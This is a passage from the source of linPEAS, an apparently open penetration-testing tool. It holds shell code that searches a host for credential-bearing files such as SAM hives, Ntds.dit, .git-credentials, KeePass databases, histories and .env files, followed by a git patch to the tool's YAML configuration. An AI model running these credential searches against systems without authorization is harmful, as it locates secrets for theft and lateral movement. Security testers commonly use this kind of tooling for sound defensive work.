"^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) + PSTORAGE_PGP_GPG=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -v -E 'README.gnupg' | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) + PSTORAGE_CACHE_VI=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) + PSTORAGE_DOCKER=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) + PSTORAGE_FIREFOX=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^" | grep -E "\.mozilla$" | sort | uniq | head -n 70) + PSTORAGE_CHROME=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^" | grep -E "google-chrome$" | sort | uniq | head -n 70) + PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) + PSTORAGE_FASTCGI=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) + PSTORAGE_SNMP=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_PYPIRC=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "\.pypirc$" | sort | uniq | head -n 70) + PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) + PSTORAGE_HISTORY=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70) + PSTORAGE_HTTP_CONF=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_HTPASSWD=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) + PSTORAGE_LDAPRC=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) + PSTORAGE_ENV=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "\.env$" | sort | uniq | head -n 70) + PSTORAGE_MSMTPRC=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) + PSTORAGE_GITHUB=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) + PSTORAGE_SVN=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "\.svn$" | sort | uniq | head -n 70) + PSTORAGE_KEEPASS=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) + PSTORAGE_FTP=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) + PSTORAGE_BIND=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "bind$" | sort | uniq | head -n 70) + PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "seeddms.*$" | sort | uniq | head -n 70) + PSTORAGE_DDCLIENT=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) + PSTORAGE_CACTI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "cacti$" | sort | uniq | head -n 70) + PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) + PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) + PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|php\.ini$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) + PSTORAGE_DATABASE=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) + PSTORAGE_BACKUPS=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "backup$|backups$" | sort | uniq | head -n 70) + PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) ##### POST SERACH VARIABLES ##### From ea5d9415b192e314bf7a09bf6d8d9d406e9ff7bb Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Tue, 13 Jul 2021 11:44:43 +0200 Subject: [PATCH 3/7] linpeas --- build_lists/sensitive_files.yaml | 161 +++++++++++++++++++++++--- linPEAS/builder/src/linpeasBuilder.py | 2 +- 2 files changed, 145 insertions(+), 18 deletions(-) diff --git a/build_lists/sensitive_files.yaml b/build_lists/sensitive_files.yaml index 456ee95..3673013 100644 --- a/build_lists/sensitive_files.yaml +++ b/build_lists/sensitive_files.yaml @@ -1,3 +1,7 @@ +############################ +## LINPEAS SPECIFICATIONS ## +############################ + root_folders: - /applications #common - /bin #common @@ -76,22 +80,11 @@ storage_template: > int_hidden_files_markup: "peass{INT_HIDDEN_FILES}" -defaults: - auto_check: False #The builder will generate a check for the file - bad_regex: "" #The regex used to color red and grep lines (if only_bad_lines and no line_grep) - check_extra_path: "" #Check if the found files are in a specific path - good_regex: "" #The regex to color green - just_list_file: False #Just mention the path to the file, do not cat it - line_grep: "" #The regex to grep lines in a file (if only_bad_lines), by default bad_regex is used here if empty - only_bad_lines: False #Only print lines containing something red - remove_empty_lines: False #Remove empty lines, use only for text files (-I param in grep) - remove_path: "" #Not interested in files containing this path - remove_regex: "" #Extra regex to remove some lines - search_in: #By default search in defined common - - common - type: f #File by default - - exec: [] + +############################## +## AUTO GENERATED VARIABLES ## +## FOR WINPEAS & LINPEAS ## +############################## variables_markup: "peass{VARIABLES}" @@ -100,7 +93,141 @@ variables: value: "7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|root|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|xfreerdp|^ssh|steghide|@" -#Files & folders to search + +#################### +## DEFAULT VALUES ## +#################### + +defaults: + auto_check: False #The builder will generate a check for the file (only linpeas) + bad_regex: "" #The regex used to color red. If only_bad_lines and no line_grep, then only lines containing this regex will be printed + check_extra_path: "" #Check if the found files are in a specific path (only linpeas) + good_regex: "" #The regex to color green + just_list_file: False #Just mention the path to the file, do not cat it + line_grep: "" #The regex to grep lines in a file. IMPORTANT: This is the argument for "grep" command so you need to specify the single and double quotes (see examples) + only_bad_lines: False #Only print lines containing something red (cnotaining bad_regex) + remove_empty_lines: False #Remove empty lines, use only for text files (-I param in grep) + remove_path: "" #Not interested in files containing this path (only linpeas) + remove_regex: "" #Remove linpeas containing this regex + search_in: #By default search in defined common (only linpeas) + - common + type: f #File by default + + exec: [] #Cmd to execute with the check (only linpeas) + + +############## +## EXAMPLES ## +############## + +#-) In the following example PostgreSQL searches are performed: +## - auto_check is True (by default set it always to True) +## - exec is and array of sh commands to execute, in this case a command is executed to get the postgresql version +## - The file "pgadmin*.db" is searched +### - just_list_file is True, so the content of the list is not going to be read, just the path of the file will be indicated +### - type is f (file, not dir) +### - search_in is "common", so look for this file in common directories +## - The file "pg_hba.conf" is searched +### - bad_regex indicates the content of the file that if found is going to be written in red in the output +### - type is f (file, not dir) +### - remove_empty_lines is True, this indicates that empty lines of the file aren't going to be written in the output +### - remove_regex is a regex to avoid printing lines where the regex is found +### - search_in is "common", so look for this file in common directories + +#- name: PostgreSQL +# value: +# config: +# auto_check: True +# exec: +# - 'echo "Version: $(warn_exec psql -V 2>/dev/null)"' +# +# files: +# - name: "pgadmin*.db" +# value: +# type: f +# just_list_file: True +# search_in: +# - common +# +# - name: "pg_hba.conf" +# value: +# bad_regex: "auth|password|md5|user=|pass=|trust" +# type: f +# remove_empty_lines: True +# remove_regex: '\W+\#|^#' +# search_in: +# - common + + + +#-) In the following example Elasticsearch searches are performed: +## - auto_check is True (by default set it always to True) +## - exec is and array of sh commands to execute, in this case a HTTP request is performed to obtain the version +## - The file "elasticsearch.y*ml" is searched +### - line_grep is the grep argument to filter interesting lineas +### - remove_regex is a regex to avoid printing lines where the regex is found +### - type is f (file, not dir) +### - search_in is "common", so look for this file in common directories + +#- name: Elasticsearch +# value: +# config: +# auto_check: True +# exec: +# - echo "The version is $(curl -X GET '127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)" +# +# files: +# - name: "elasticsearch.y*ml" +# value: +# line_grep: 